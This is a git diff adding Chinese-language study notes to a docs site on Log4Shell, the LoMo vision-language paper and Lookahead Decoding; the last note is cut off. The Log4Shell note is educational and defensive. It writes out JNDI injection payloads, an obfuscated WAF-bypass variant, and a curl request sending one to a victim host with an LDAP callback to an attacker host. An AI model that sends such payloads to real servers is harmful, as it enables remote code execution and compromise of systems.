基准测试已开源:https://github.com/Yaxin9Luo/LLMSurgeon diff --git a/src/content/docs/papers/log4shell-cve-2021-44228.md b/src/content/docs/papers/log4shell-cve-2021-44228.md new file mode 100644 index 000000000..09c3f36cd --- /dev/null +++ b/src/content/docs/papers/log4shell-cve-2021-44228.md @@ -0,0 +1,256 @@ +--- +title: Log4Shell (CVE-2021-44228) — 一条日志字符串如何远程控制服务器 +来源: https://logging.apache.org/log4j/2.x/security.html +日期: 2026-06-13 +分类: 安全与隐私 +子分类: 安全与隐私 +难度: 入门 +provenance: pipeline-v3 +--- + +## 是什么 + +**Log4Shell** 是 2021 年 12 月披露的 **Apache Log4j 2** 远程代码执行(RCE)漏洞,编号 **CVE-2021-44228**,CVSS 3.1 评分 **10.0(Critical)**。攻击者只需把一段特殊字符串写进**会被 Log4j 记录的日志**(HTTP 头、User-Agent、表单字段、用户名等),受害 Java 应用在格式化日志时会触发 **JNDI Lookup**,从攻击者控制的 LDAP/RMI 服务器拉取并执行恶意 Java 类——**无需登录、无需已知漏洞链的其他环节**。 + +官方安全公告:[Apache Log4j 2.x Security](https://logging.apache.org/log4j/2.x/security.html)。别名 **Log4Shell**、**LogJam**。由阿里云安全团队 Chen Zhaojun 于 2021 年 11 月报告,12 月 9 日公开后数小时内即出现大规模在野利用。 + +日常类比: + +> 想象公司前台有一本**访客登记簿**(日志系统),规定:若访客在姓名栏写了「请帮我查一下档案室电话:xxx」,前台必须**真的去查电话簿**并把结果抄进本子。 +> 攻击者不在大楼里,只在姓名栏写:`${jndi:ldap://坏人的服务器/恶意指令}`。前台照章办事,按「查电话簿」的规则连到坏人架设的「电话簿服务器」,对方返回的不是电话号码,而是一份**可执行的内部操作手册**(远程 Java 类)。前台员工(JVM)按手册操作,等于把大楼钥匙交给了墙外的人。 +> 最致命的是:登记簿几乎**所有入口**都会写——Web 请求、登录失败、搜索框、甚至 Minecraft 聊天——而 Log4j 在 Java 生态里像「默认登记簿」一样无处不在。 + +一句话:**Log4Shell 把「日志里的模板替换」变成了「远程下载并执行代码」的通道,让写日志这件最不起眼的事成了 RCE 入口。** + +## 为什么重要 + +不理解 Log4Shell,下面这些事都讲不清: + +- 为什么 2021 年 12 月全球 IT 进入「Log4j 紧急响应周」,CISA 与各国 CERT 连夜发通告 +- 为什么一个**日志库**漏洞能影响 VMware、Elastic、Steam、iCloud、各国政府网站——因为 Log4j 2 被嵌在无数 Java 产品里,且**默认配置即可利用** +- 为什么漏洞披露后还接连出现 **CVE-2021-45046**(2.15.0 修复不完整)、**CVE-2021-45105**(DoS)、**CVE-2021-44832**(JDBC Appender)——同一 Lookup 机制的多条攻击面 +- 为什么 **SBOM**(软件物料清单)、**依赖扫描(SCA)**、Sigstore 签名在 2022 年后成为供应链安全标配——Log4Shell 证明「你甚至不知道自己在用 Log4j」 +- 为什么 WAF 规则、`${jndi:` 拦截、JndiLookup 类删除成为临时缓解手段,而**升级 log4j-core** 才是正解 + +受影响版本(`log4j-core`):**2.0-beta9 至 2.14.1**(以及部分 2.12.x / 2.3.x 分支,见官方区间表示)。仅依赖 `log4j-api` 而无 `log4j-core` 的应用**不受此 CVE 影响**。 + +## 核心概念 + +### 1. Log4j 2 与 Lookup 机制 + +**Log4j 2** 是 Java 生态最流行的日志框架之一(Maven 上数千包传递依赖)。除普通 `%m` 打日志外,2.x 支持 **Lookup**:在日志消息或配置里写 `${prefix:name}`,运行时解析并替换为动态值。 + +常见 Lookup 示例: + +| 语法 | 含义 | +|------|------| +| `${java:version}` | 当前 JVM 版本 | +| `${env:USER}` | 环境变量 | +| `${ctx:requestId}` | 线程上下文 MDC | +| `${jndi:ldap://host/obj}` | **JNDI 查询** — Log4Shell 根源 | + +Lookup 不仅出现在配置文件,也会在处理**日志消息正文**时触发——这是攻击面扩大的关键。 + +### 2. JNDI(Java Naming and Directory Interface) + +**JNDI** 是 Java 标准 API,用于按名字查找对象,支持 LDAP、RMI、DNS、CORBA 等协议。正常用途:应用从目录服务获取数据库连接、JMS 工厂等。 + +Log4j 2.0-beta9(2013,[LOG4J2-313](https://issues.apache.org/jira/browse/LOG4J2-313))加入 **JndiLookup**。规则简述: + +- 默认 JNDI 名会加前缀 `java:comp/env/` +- 若 key 中含 **`:`**,则**不加前缀**,直接按完整 URI 解析 + +因此 `${jndi:ldap://attacker.com/a}` 会发起 **LDAP 请求**,从远程加载对象。 + +### 3. 从 JNDI 注入到 RCE 的链条 + +典型利用链(简化): + +```text +1. 攻击者 → 受害应用:User-Agent: ${jndi:ldap://evil.com:1389/Exploit} +2. 应用代码:logger.info("Request from {}", userAgent); // 用户输入进入日志 +3. Log4j:解析 ${jndi:...} → JndiLookup.lookup() +4. JVM:连接 evil.com LDAP,获取 Java 对象引用 +5. LDAP 响应指向 http://evil.com/Exploit.class +6. JVM 加载并实例化 Exploit → 攻击者代码在受害进程内执行 +``` + +本质是 **JNDI 注入** + **不受信任的远程类加载**;Log4Shell 的特殊性在于 **Log4j 使用面极广** 且 **用户输入极易进入日志**。 + +### 4. 攻击向量:任何「会被记下来」的输入 + +公开 PoC 与在野利用显示,payload 可出现在: + +- HTTP 头:`User-Agent`、`X-Api-Version`、`Referer`、`Authorization` +- URL 路径与查询参数 +- JSON/XML 请求体字段 +- 登录表单的 username(失败登录也会记录) +- 线程上下文 MDC(若应用把 Header 放进 MDC,见 CVE-2021-45046) + +攻击者还使用 **大小写混淆**(`${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://...}`)、**嵌套 Lookup** 等绕过简单 WAF。 + +### 5. 相关 CVE 时间线(Log4j「补丁马拉松」) + +| CVE | 问题 | 修复版本(Java 8+) | +|-----|------|---------------------| +| **CVE-2021-44228** | 消息中 JNDI Lookup → RCE | ≥ 2.15.0(后证明不足) | +| **CVE-2021-45046** | 2.15.0 在非默认 Pattern + MDC 下仍可 RCE | ≥ 2.16.0 | +| **CVE-2021-45105** | 自引用 Lookup → StackOverflow DoS | ≥ 2.17.0 | +| **CVE-2021-44832** | JDBC Appender 配置 JNDI 数据源 → RCE | ≥ 2.17.0(限制协议) | + +生产环境建议:**Java 8+ 使用 log4j-core ≥ 2.17.0**(或当前官方推荐最新版)。 + +## 漏洞代码路径(概念) + +Log4j 在格式化日志时会递归解析 `${...}`。简化逻辑如下(非完整源码,便于理解): + +```java +// 概念示意:PatternLayout / MessagePattern 处理消息 +public String replaceLookups(String message) { + // 若消息含 ${jndi:ldap://evil/a},会进入 lookup 解析 + while (message.contains("${")) { + message = StrSubstitutor.replace(message, lookupMap); + // lookupMap 包含 "jndi" -> JndiLookup 实例 + } + return message; +} +``` + +`JndiLookup` 核心行为(概念): + +```java +// org.apache.logging.log4j.core.lookup.JndiLookup(简化) +public String lookup(String key) { + // key 形如 "ldap://attacker.com/Exploit" + if (key.contains(":")) { + Context ctx = new InitialContext(); + Object obj = ctx.lookup(key); // 触发远程 LDAP/RMI + return obj == null ? null : obj.toString(); + } + return ctx.lookup("java:comp/env/" + key); +} +``` + +应用侧**一行普通日志**即可触发: + +```java +@RestController +public class LoginController { + private static final Logger log = LogManager.getLogger(LoginController.class); + + @PostMapping("/login") + public ResponseEntity login(@RequestHeader("User-Agent") String ua, + @RequestBody LoginForm form) { + // 开发者以为只是记审计日志 + log.warn("Failed login for user {} from UA {}", form.getUsername(), ua); + return ResponseEntity.status(401).build(); + } +} +``` + +攻击请求(curl 示例): + +```bash +curl -s -X POST 'https://victim.example/login' \ + -H 'Content-Type: application/json' \ + -H 'User-Agent: ${jndi:ldap://attacker.example:1389/a}' \ + -d '{"username":"admin","password":"wrong"}' +``` + +若服务端 Log4j 2.0-beta9–2.14.1 且未缓解,**401 响应返回之前** JVM 可能已 outbound 连接攻击者 LDAP。 + +## 检测与排查 + +### 依赖扫描 + +在项目中查找 `log4j-core` JAR 版本: + +```bash +# Maven +mvn dependency:tree | grep log4j-core + +# 或搜索 fat JAR / 部署目录 +find . -name 'log4j-core-*.jar' -exec unzip -p {} META-INF/MANIFEST.MF \; | head +``` + +确认 `org/apache/logging/log4j/core/lookup/JndiLookup.class` 是否存在: + +```bash +jar tf log4j-core-2.14.1.jar | grep JndiLookup +``` + +### 日志与网络 IOC + +- 应用/WAF 日志中出现 `${jndi:`、`${lower:`、`ldap://`、`rmi://` +- 受害主机对**异常外连 LDAP/RMI 端口**(常见 1389、1099)的 DNS/连接 +- 2021 年 12 月后威胁情报中的 Log4Shell 利用家族(如 Khonsari、Mirai 变种等) + +### 临时缓解(不能替代升级) + +官方 [CVE-2021-44228 缓解](https://logging.apache.org/log4j/2.x/security.html#CVE-2021-44228) 包括: + +1. **升级** log4j-core 至安全版本(首选) +2. **删除 JndiLookup 类**(需重启): + +```bash +zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class +``` + +3. **2.10–2.14.1** 可设 `-Dlog4j2.formatMsgNoLookups=true` 或环境变量 `LOG4J_FORMAT_MSG_NO_LOOKUPS=true`(**2.15.0 后此属性无效**;且无法覆盖 CVE-2021-45046 等后续问题) +4. 配置 Pattern Layout 使用 `%m{nolookups}`(仅部分版本有效,见 CVE-2021-45046 说明) + +**Log4j 1.x**:无 Lookup,风险较低;但若配置使用 **JMSAppender** 等 JNDI 相关组件,见 CVE-2021-4104。Log4j 1 已 EOL,应迁移到 Log4j 2 安全版本。 + +## 防御纵深(2026 视角) + +Log4Shell 之后,行业实践通常包括: + +1. **依赖治理**:CI 中 SCA(Dependabot、Snyk、OWASP Dependency-Check),禁止带漏洞的 `log4j-core` 进入制品 +2. **SBOM**:CycloneDX / SPDX,Log4j 官方现提供 [VDR](https://logging.apache.org/cyclonedx/vdr.xml) 链接 +3. **最小权限**:运行 Java 服务的 OS 账户非 root;出站防火墙限制 LDAP/RMI 等非业务协议 +4. **输入与日志分离**:不把原始 Header 直接拼进日志格式串;MDC 中的用户数据要假设可被污染 +5. **WAF / RASP**:作为**补充层**,不能替代补丁(绕过变种多) + +Apache 现行 [威胁模型](https://logging.apache.org/log4j/2.x/security.html) 明确:**日志消息、MDC、参数 string 化结果均视为不可信输入**;配置与环境变量为可信源——部署者须防止未授权修改配置。 + +## 与同类漏洞的对比 + +| 维度 | Log4Shell | Heartbleed (2014) | Shellshock (2014) | +|------|-----------|-------------------|-------------------| +| 层次 | 应用库(Java) | TLS 库(OpenSSL) | Shell(bash) | +| 触发 | 写日志 | 恶意 TLS 心跳 | 环境变量 + 函数导出 | +| 认证 | 通常无需 | 无需 | 视场景 | +| 修复 | 升级 JAR | 升级 OpenSSL | 升级 bash | +| 供应链 | 传递依赖难盘点 | 系统库 | 系统默认 shell | + +与 [[lipp-meltdown-2018]]、[[spectre-attack-2018]] 等**硬件侧信道**不同,Log4Shell 是**纯软件、默认配置、网络可达**的 RCE,因此 CVSS 满分且利用门槛极低。 + +## 动手理解(安全实验环境) + +仅在**隔离 lab** 中复现(勿对未授权目标扫描): + +1. 部署含 Log4j 2.14.0 的 Java Web 演示(如 Spring Boot + log4j-core) +2. 用 [marshalsec](https://github.com/mbechler/marshalsec) 或类似工具起 LDAP 引用服务器 +3. 发送 `${jndi:ldap://:1389/...}` payload,抓包观察 outbound LDAP 与类加载 + +理解目标:**证明「日志字符串 → JNDI → 外连」**,而非学会武器化。 + +## 自测题 + +1. 为什么仅升级 `log4j-api` 不能修复 Log4Shell? +2. `${java:version}` 与 `${jndi:ldap://x/a}` 在 Lookup 解析上有何关键区别? +3. 说明 CVE-2021-44228 与 CVE-2021-45046 的关系;为何 2.15.0 一度被认为「已修复」仍不够? +4. 列举三种可能把攻击字符串送进 Log4j 的业务场景。 +5. `zip -d ... JndiLookup.class` 缓解的原理是什么?有何局限? + +## 延伸阅读 + +- [Apache Log4j 2.x Security — CVE-2021-44228](https://logging.apache.org/log4j/2.x/security.html#CVE-2021-44228) +- [CISA Apache Log4j Vulnerability Guidance](https://www.cisa.gov/news-events/news/apache-log4j-vulnerability-guidance) +- [Cloudflare — Inside the Log4j2 vulnerability](https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-44228/) +- [LunaSec Log4Shell 检测与缓解指南](https://www.lunasec.io/docs/blog/log4j-zero-day/) +- 相关笔记:[[meltdown-attack-2018]](硬件泄漏)、[[spectre-attack-2018]](推测执行) + +## 小结 + +Log4Shell 的本质是:**把用户可控数据写进日志时,Log4j 2 的 JNDI Lookup 会替攻击者执行「查目录并加载远程对象」**。它震动的不仅是 Java 社区,而是整个**软件供应链可见性**——你永远不知道下一个「登记簿规则」藏在哪个传递依赖里。零基础记住三件事:**查 log4j-core 版本、优先升级到 2.17+、任何进日志的输入都当不可信**。 diff --git a/src/content/docs/papers/lomo-modality.md b/src/content/docs/papers/lomo-modality.md new file mode 100644 index 000000000..790da6bcf --- /dev/null +++ b/src/content/docs/papers/lomo-modality.md @@ -0,0 +1,328 @@ +--- +title: LoMo — 局部模态替换与更深的视觉-语言融合 +来源: https://arxiv.org/abs/2605.30265 +日期: 2026-06-13 +子分类: 模型与训练 +分类: 机器学习 +provenance: pipeline-v3 +--- + +## 从日常类比开始:同一段话,换张「纸」就不认识了 + +想象你在参加一场**开卷考试**。题目写在试卷上,你也看得懂;监考老师把**同一道题**打印成一张小图片贴在你旁边——语义完全一样,只是**信息载体**从「文字」变成了「像素」。 + +理想的多模态 AI 应该像真正理解题意的人:**不管题目是打字还是截图,答案都一样**。但现实里的 Vision-Language Model(VLM)往往做不到:把文字问题渲染成图片后,准确率会**断崖式下跌**。论文把这种现象叫做 **Carrier Sensitivity(载体敏感性)**——模型不是在理解语义,而是在**依赖「信息装在哪种模态里」**。 + +更糟的是,这种脆弱性不是随机的。论文测量「纯文本 hidden state」与「渲染成图后的 hidden state」之间的余弦距离,发现:**距离越大,换载体后的性能掉得越狠**(最近一组平均掉 7.75%,最远一组掉 21.23%)。 + +根因被归结为**训练数据的结构性偏置**: + +| 常见数据集 | 文本的典型角色 | 图像的典型角色 | +|-----------|---------------|---------------| +| Image Caption | 描述目标(答案侧) | 被描述的场景 | +| VQA | 提问、指令 | 视觉证据 | +| OCR / 文档 | 问题或标签 | 文档页面 | +| 网页交错数据 | 导航、说明 | 插图、截图 | + +文本长期扮演「**语言查询**」,图像长期扮演「**视觉参考**」——模型学会了**按模态分工取信息**,却没有学会「**同一语义在不同载体上应对齐**」。 + +2026 年 5 月,复旦大学 / 上海创新研究院 / 京东等团队发布 **LoMo: Local Modality Substitution for Deeper Vision-Language Fusion**(arXiv:[2605.30265](https://arxiv.org/abs/2605.30265))。核心思路极其朴素:**不改模型结构,只在 SFT 数据里,把一段文字局部替换成它的渲染图**,逼模型在 `text → visual → text` 的交错序列里做真正的跨模态融合。 + +一句话:**LoMo 不是新架构,而是一份「数据侧处方」——用局部模态替换,把跨载体对齐写进标准 SFT 的监督信号里。** + +--- + +## 是什么 + +| 项目 | 内容 | +|------|------| +| 全称 | **Lo**cal **Mo**dality Substitution | +| 类型 | 数据策展(data curation)范式,架构无关 | +| 机构 | 复旦大学、上海创新研究院、上海交大、中科大、京东等 | +| 代码 / 模型 | [Maplebb/LoMo](https://github.com/Maplebb/LoMo)(checkpoint 已释出,数据构造代码待发布) | +| 项目页 | [maplebb.github.io/LoMo](https://maplebb.github.io/LoMo/page/) | +| 验证骨干 | LLaVA-OneVision-1.5-8B、Qwen3.5-9B | +| 评测 | 13 个多模态 benchmark(推理、数学、事实性、指令遵循、文档 OCR、视觉感知) | + +LoMo 的输入原本是**纯文本**的 `(问题 x, 答案 a)`;输出变成**图文交错**的 `(T(x), a)`,其中 `T(x) = (x_pre, I', x_suf)`,中间嵌入渲染图 `I'`,**监督目标 a 不变**。 + +--- + +## 为什么重要 + +### 1. 暴露了 VLM「假融合」的一面 + +很多 VLM 在标准 benchmark 上分数很高,但把问题文字截图喂进去就崩——说明融合停留在「**各读各的再拼接**」,而非「**语义级等价**」。这对 OCR、文档 QA、屏幕理解等「文字常以像素出现」的场景是致命伤。 + +### 2. 改数据比改结构更便宜 + +LoMo 声称: + +- **零推理开销**(训练后推理流程不变) +- **无需额外标注**(复用原有 SFT 答案) +- **即插即用**(任何多模态 SFT pipeline 都能接) + +在 LLaVA-OneVision-1.5-8B 上平均 **+2.68** 分,Qwen3.5-9B 上 **+2.82** 分(13 benchmark 均值);在 **Rendered Evaluation**(整题渲染成图)下增益放大到 **+18.86 / +11.92**——说明它确实在修「载体敏感」这个根问题。 + +### 3. 给「模态鸿沟」提供了可操作的度量 + +论文用两个内部指标交叉验证: + +- **MIR(Modality Integration Rate)**:各层 visual / text token 隐状态分布的 Fréchet 距离均值,**越低越好** +- **Pairwise Cross-Modal Distance**:同一语义下文本与渲染图的平均 hidden state 余弦距离 `d = 1 - cos(h̄_text, h̄_img)`,**越低越好** + +LoMo 训练后 MIR 额外降低 0.122,配对距离从 0.57 降到 0.49;Standard SFT 反而把配对距离从 0.52 **推远**到 0.57——常规 SFT 在强化「文本问、图像答」的分工,LoMo 在拉近等价载体。 + +--- + +## 核心概念 + +### 1. Carrier Sensitivity(载体敏感性) + +**定义**:语义内容不变,仅把承载方式从 token 换成 pixel(或反之),模型输出质量显著变化。 + +**诊断实验**:Rendered Evaluation——把整段文字问题渲染成一张图,与原 `(图像, 文字问题)` 对比。主流 VLM 在此协议下普遍大跌。 + +### 2. 三阶段流水线 T(x) + +LoMo 把变换算子分解为三步: + +```text +x ──S()──► (x_pre, x_mid, x_suf) # 结构感知选段 +x_mid ──R()──► 渲染图 I # 内容感知渲染 +I ──A()──► I' # 感知扰动 +T(x) = (x_pre, I', x_suf) # text → visual → text +``` + +| 阶段 | 符号 | 做什么 | +|------|------|--------| +| Structure-Aware Span Localization | S | 公式感知分块,取**中间 1/3** 作为 x_mid;短文本整段替换 | +| Visual Rendering | R | 含公式 → LaTeX 渲染器;纯文本 → 普通文本渲染;失败自动 fallback | +| Perceptual Distortion | A | 随机施加旋转、模糊、阴影/污渍、波浪形变,模拟扫描/拍照退化 | + +**为什么选中间段?** 消融显示 Middle(text-image-text)优于 Prefix/Suffix/Multi-Span:渲染块被**两侧文本夹住**,模型必须跨载体整合上下文才能答对——对齐从「可选优化」变成「**任务必要条件**」。 + +### 3. 隐式跨模态对齐监督 + +标准 SFT 优化 `-log p(a | x)`。LoMo 额外优化 `-log p(a | T(x))`。论文推导在期望意义下,多出来的项等价于拉近两个载体下预测分布的 **KL 散度**——**不用改 loss 公式,改数据形态就注入了 cross-carrier alignment 信号**。 + +### 4. 关键超参:Rewrite Ratio + +在 LLaVA-OneVision-1.5-8B 上,把**纯文本样本**中一定比例改写为 LoMo 交错样本: + +| Rewrite Ratio | 平均准确率 | Δ vs Standard SFT | +|---------------|-----------|-------------------| +| 0% | 40.88 | — | +| 25% | 42.90 | +2.02 | +| **50%** | **43.56** | **+2.68** | +| 75% | 43.24 | +2.36 | +| 100% | 42.68 | +1.80 | + +50% 左右最优——太少对齐信号不够,太多则纯文本能力被稀释。 + +### 5. 与相关路线的区别 + +| 路线 | 代表 | 目标 | +|------|------|------| +| Text-as-Pixels 效率派 | DeepSeek-OCR、Glyph | 用像素**压缩**上下文、省 token | +| 解码/偏好对齐 | VCD、HA-DPO | 推理或 RL 阶段减幻觉 | +| **LoMo** | 本篇 | 在**同一条训练样本**里让 text-token 与 text-pixel **语义对齐** | + +--- + +## 实验结果速览 + +### Standard Evaluation(常规:图 + 文字问题) + +- LLaVA-OV1.5-8B:**40.88 → 43.56**(+2.68) +- Qwen3.5-9B:**54.43 → 57.25**(+2.82) +- 涨幅集中在:指令遵循(MM-IFEval)、视觉感知(CountBench、V*)、文档 OCR(DocVQA) + +### Rendered Evaluation(问题也渲染成图) + +- LLaVA:**15.24 → 34.10**(+18.86) +- Qwen3.5:**43.26 → 55.18**(+11.92) +- Qwen3.5 上 Standard→Rendered 的性能落差:Standard SFT **-11.17**,LoMo 仅 **-2.07** + +### 组件消融(LLaVA-OV1.5-8B) + +| 变体 | 平均 | 说明 | +|------|------|------| +| Standard SFT | 40.88 | 基线 | +| Full-Text Rendering | 42.07 | 整题渲染,无选段/扰动,增益有限 | +| LoMo w/o PD | 43.10 | 去掉感知扰动仍 +2.22 | +| **LoMo 完整** | **43.56** | 选段是主因,扰动再 +0.46 | + +--- + +## 代码示例 + +### 示例 1:LoMo 数据变换的最小 Python 骨架 + +下面代码演示论文公式 (1)(2) 的逻辑:**选段 → 渲染 → 扰动 → 拼回交错序列**。渲染器用 Pillow 占位,生产环境应换 LaTeX / 专用文本渲染管线。 + +```python +from dataclasses import dataclass +from typing import Tuple +import random +from PIL import Image, ImageDraw, ImageFont, ImageFilter + +@dataclass +class LoMoSample: + prefix: str + image: Image.Image + suffix: str + answer: str + +def structure_aware_span_localization(text: str) -> Tuple[str, str, str]: + """S(·): 公式感知分块的简化版——按块取中间 1/3。""" + blocks = text.split("\n\n") if "\n\n" in text else [text] + if len(blocks) <= 2: + return "", text, "" + n = len(blocks) + start = n // 3 + end = max(start + 1, 2 * n // 3) + pre = "\n\n".join(blocks[:start]) + mid = "\n\n".join(blocks[start:end]) + suf = "\n\n".join(blocks[end:]) + return pre, mid, suf + +def render_text_span(span: str, width: int = 640, height: int = 128) -> Image.Image: + """R(·): 纯文本渲染;含 $...$ 或 \\frac 时应路由到 LaTeX 渲染器。""" + img = Image.new("RGB", (width, height), "white") + draw = ImageDraw.Draw(img) + font = ImageFont.load_default() + draw.text((10, 10), span[:500], fill="black", font=font) + return img.crop(img.getbbox()) # 裁掉空白边距 + +def perceptual_distortion(img: Image.Image) -> Image.Image: + """A(·): 随机施加一种语义保持的退化。""" + op = random.choice(["none", "blur", "rotate"]) + if op == "blur": + return img.filter(ImageFilter.GaussianBlur(radius=2)) + if op == "rotate": + return img.rotate(random.choice([5, -5, 15, -15]), expand=True, fillcolor="white") + return img + +def lomo_transform(question: str, answer: str) -> LoMoSample: + x_pre, x_mid, x_suf = structure_aware_span_localization(question) + rendered = render_text_span(x_mid) + distorted = perceptual_distortion(rendered) + return LoMoSample(prefix=x_pre, image=distorted, suffix=x_suf, answer=answer) + +# 用法 +raw_q = "Given the chart, compute the area.\n\nFormula: A = π r² with r = 3.\n\nAnswer in cm²." +sample = lomo_transform(raw_q, answer="28.27") +# 训练时构造: [x_pre tokens] + [image tokens] + [x_suf tokens] → 监督仍为 answer +print(sample.prefix, sample.suffix, sample.answer) +``` + +### 示例 2:构造 VLM 训练消息 + 评测「载体敏感」 + +用 Hugging Face 多模态消息格式,把 LoMo 样本喂给 LLaVA / Qwen 类模型;同时演示 **Rendered Evaluation** 探针。 + +```python +def to_training_messages(sample: LoMoSample, scene_image_path: str) -> list: + """交错样本:场景图 + 前缀文本 + 渲染块图 + 后缀文本。""" + content = [] + if scene_image_path: + content.append({"type": "image", "image": scene_image_path}) + if sample.prefix.strip(): + content.append({"type": "text", "text": sample.prefix.strip()}) + content.append({"type": "image", "image": sample.image}) # 局部替换的视觉载体 + if sample.suffix.strip(): + content.append({"type": "text", "text": sample.suffix.strip()}) + return [ + {"role": "user", "content": content}, + {"role": "assistant", "content": [{"type": "text", "text": sample.answer}]}, + ] + +def rendered_eval_probe(full_question: str, scene_image_path: str) -> list: + """Rendered Evaluation:整题渲染成一张图,测 carrier sensitivity。""" + q_img = render_text_span(full_question, width=800, height=400) + return [ + {"role": "user", "content": [ + {"type": "image", "image": scene_image_path}, + {"type": "image", "image": q_img}, # 文字问题变成像素 + ]}, + ] + +def pairwise_cross_modal_distance(h_text, h_img) -> float: + """论文 Eq.(7): 1 - cos(h̄_text, h̄_img),用于分析对齐程度。""" + import torch + h_text = h_text / h_text.norm() + h_img = h_img / h_img.norm() + return float(1 - torch.dot(h_text, h_img)) +``` + +训练时:**50% 左右的纯文本 SFT 样本**走 `lomo_transform`,其余保持原样;loss 仍是标准 next-token prediction,无需自定义对齐 loss。 + +--- + +## 实现要点与踩坑 + +1. **选段比整段渲染重要**:Full-Text Rendering 几乎只带来 +1.19,Middle 交错结构才是 +2.68 的主因。 +2. **LaTeX 路由不能省**:数学题走 LaTeX 渲染,失败要有 fallback,否则吞吐和数据质量双崩。 +3. **扰动模拟真实文档**:扫描倾斜、模糊、折痕——让模型对齐的是**语义**,不是「干净截图的字形」。 +4. **Rewrite Ratio 有饱和点**:50% 左右最佳;100% 反而掉分,纯文本推理能力受损。 +5. **增益不只是「多看了几张图」**:把 image:text 比例强行配平到 1:1,LoMo 仍 +2.45——关键在**交错跨载体**,不是样本计数。 + +--- + +## 局限与开放问题 + +- **数据构造代码尚未完全开源**(截至 2026-06,GitHub TODO 仍含 construction / training scripts)。 +- **渲染风格域**:字体、排版、语言(中文 vs 英文)变化可能带来新偏置。 +- **整题 Rendered Eval 仍非满分**:LoMo 大幅缓解但未消除载体敏感,说明对齐仍是长期课题。 +- **与 RL / DPO 的叠加效果**:论文聚焦 SFT 数据侧,与偏好优化、推理时干预如何组合尚待探索。 + +--- + +## 与本文库其他条目怎么读 + +- 先读 [Qwen2-VL](/papers/qwen2-vl-2024):理解现代 VLM 如何把图像 token 接进 LLM。 +- 再读 [Flash Attention](/papers/flash-attention):长文档 + 多图交错时,注意力算力是工程底座。 +- LoMo 补的是**训练数据几何**:同样 ViT–LLM 骨架,换 SFT 样本形态就能改变模态融合深度。 + +--- + +## 自测题 + +1. **Carrier Sensitivity** 和普通的 domain shift 有何不同? +2. 为什么 LoMo 选「中间 1/3」而不是开头或结尾? +3. Standard SFT 为何会把 pairwise cross-modal distance **越训越大**? +4. 若只有 10% 纯文本 SFT 数据,Rewrite Ratio 50% 意味着什么? +5. LoMo 与 DeepSeek-OCR 类「text-as-pixels 压缩」目标有何本质区别? + +
+参考答案(先自己想) + +1. Carrier Sensitivity 强调**语义等价**下仅换载体;domain shift 通常连语义分布都变。 +2. Middle 形成 text–image–text,模型必须融合两侧文本与中间视觉块才能恢复完整语义;Prefix/Suffix 允许「单模态猜答案」。 +3. 常规数据里文本负责 query、图像负责 evidence,SFT 可完成任务而**不必**对齐等价文本与渲染图;LoMo 把对齐变成答题必要条件。 +4. 约 5% 总样本被 LoMo 改写(10%×50%),其余 95% 保持原协议——实际比例需按「纯文本子集」而非全量算。 +5. OCR/压缩路线用像素**替代** token 省长度;LoMo 在同一样本里让两种载体**共存并对齐**,服务融合而非压缩。 + +
+ +--- + +## 引用 + +```bibtex +@article{han2026lomo, + title={LoMo: Local Modality Substitution for Deeper Vision-Language Fusion}, + author={Han, Feng and Zhang, Zhixiong and Liang, Zheming and Wang, Yibin and Wang, Jiaqi}, + journal={arXiv preprint arXiv:2605.30265}, + year={2026} +} +``` + +--- + +## 延伸阅读 + +- 论文 HTML:[arXiv:2605.30265v1](https://arxiv.org/html/2605.30265v1) +- 项目页:[maplebb.github.io/LoMo](https://maplebb.github.io/LoMo/page/) +- 代码 / Checkpoint:[github.com/Maplebb/LoMo](https://github.com/Maplebb/LoMo) +- MIR 指标原文:Huang et al., 2024(Modality Integration Rate) diff --git a/src/content/docs/papers/longformer-2020.md b/src/content/docs/papers/longformer-2020.md index e09ba75f0..89ee947d0 100644 --- a/src/content/docs/papers/longformer-2020.md +++ b/src/content/docs/papers/longformer-2020.md @@ -2,7 +2,7 @@ title: Longformer — 滑窗加少数全局 token,把长文档喂进 Transformer 来源: 'Beltagy, Peters, Cohan, "Longformer: The Long-Document Transformer", arXiv 2004.05150 (2020)' 日期: 2026-05-31 -子分类: 模型与训练 +子分类: ml 分类: 机器学习 难度: 中级 provenance: pipeline-v3 diff --git a/src/content/docs/papers/lookahead-decoding-2024.md b/src/content/docs/papers/lookahead-decoding-2024.md new file mode 100644 index 000000000..3f2ce9cf0 --- /dev/null +++ b/src/content/docs/papers/lookahead-decoding-2024.md @@ -0,0 +1,316 @@ +--- +title: "打破链式依赖:Lookahead Decoding (Jacobi) 零基础学习笔记" +来源: https://arxiv.org/abs/2402.02057 +日期: 2026-06-13 +分类: 机器学习 +子分类: ML 系统 +provenance: pipeline-v3 +--- + +# 打破链式依赖:Lookahead Decoding (Jacobi) 零基础学习笔记 + +## 1 一个日常类比:两个人抄课文 + +假设老师让你抄一段 100 个字的课文。 + +**传统方式(自回归解码)**:你先抄第 1 个字,抄完才能抄第 2 个字,再抄第 3 个字……一个字一个字来。即使你的右手(GPU 的并行计算单元)闲着,你也只能一个字一个字抄,因为你不确认第 2 个字写什么之前,第 3 个字根本不知道是什么。 + +**Lookahead Decoding 的方式**:现在来了一个帮手。你抄完第 1 个字后,帮手说:"我猜接下来 5 个字是 ABCDE,你一边验证我猜的对不对,我一边接着猜下一组 5 个字。" + +- 如果帮手猜对了 4 个,你直接把这 4 个抄上去,省了 4 步 +- 如果猜错了第 3 个,你只抄前 2 个,第 3 个你自己重新写 + +关键:**帮手猜字的过程是并行的**——他不用等你确认第 1 个字对不对才猜第 2 个字。他同时猜 ABCDE 五个字,你用一个"验证步骤"全部验完。 + +## 2 要解决的问题:LLM 推理为什么慢 + +大语言模型(比如 GPT)生成文本时,是一步一步来的: + +1. 输入提示词,模型输出第 1 个词 +2. 把第 1 个词加回去,再输入模型,输出第 2 个词 +3. 继续…… + +这叫 **自回归解码(autoregressive decoding)**。问题在于: + +- 每次只生成 **1 个词**,但现代 GPU 能并行算 **成千上万个词** +- GPU 的大量并行计算单元在等待——这就像买了一辆法拉利,却只用来在小区里以 5km/h 的速度开车 +- 瓶颈是 **显存带宽(memory bandwidth)**:读一次模型权重很慢,但你每次只产出一个词,效率极低 + +## 3 核心概念拆解 + +### 3.1 自回归解码 vs Jacobi 解码 + +在数值计算中,有两个经典方法解方程: + +- **Gauss-Seidel**:算出一个值就用它去算下一个( sequential,一步一步来) +- **Jacobi**:用上一轮的所有值同时算这一轮的所有值(parallel,大家一起算) + +类比到 LLM 生成: + +| | Gauss-Seidel(自回归)| Jacobi | 